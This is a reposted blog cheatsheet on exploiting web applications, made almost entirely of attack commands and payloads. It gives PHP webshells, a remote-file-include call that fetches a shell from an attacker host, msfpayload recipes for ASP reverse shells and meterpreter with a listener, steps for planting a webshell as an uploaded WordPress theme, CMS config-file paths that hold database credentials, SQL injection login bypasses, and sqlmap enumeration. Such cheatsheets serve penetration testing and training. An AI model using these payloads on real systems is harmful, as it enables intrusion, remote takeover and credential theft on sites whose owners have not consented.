Web Application exploitation - a cheatsheet By Tim Arneaud

If you want to get the full article, please go to the Source.


WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>
<?php system($_GET['cmd']) ?>
or
<?php system($_REQUEST['cmd']); ?>
Example usage via Remote File Include (RFI):
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp
------
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>
exploit

Specific Web applications
Joomla
Joomla default database configuration filename
<web-app-path>/configuration.php
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>
/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla

WordPress
WordPress  default database configuration filename
<web-app-path>
WordPress default login page
<web-app-path> /wp-login.php
WordPress plugins
<web-app-path> /wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]
/pentest/enumeration/web/cms-explorer   -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php
<?php system($_GET['cmd']) ?>
zip -r wpx.zip wpx
upload wpx.zip via web interface as an installed theme
Command execution access is via: 
<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)> 
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)

Cacti
Cacti default database configuration filename
<web-app-path> /include/config.php

DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
<web-app-path> /inc/mysql.php

Drupal
Drupal  default database configuration filename
<web-app-path> /sites/default/settings.php

Scanning WordPress for plugins and versions

/pentest/enumeration/web/cms-explorer  -url <target-and-drupal-path> -type drupal

Timeclock

Timeclock default database configuration filename

<web-app-path>/db.php

 
SQL Terminators/Comments
MSSQL and MySQL:
<sql injected command>;--
MySQL:
<sql injected command>;#

Login Pages Basic SQL injection 
MS IIS
' OR '1=1';--

MySQL
'OR 1=1--

SQLMap commands
cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba

Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00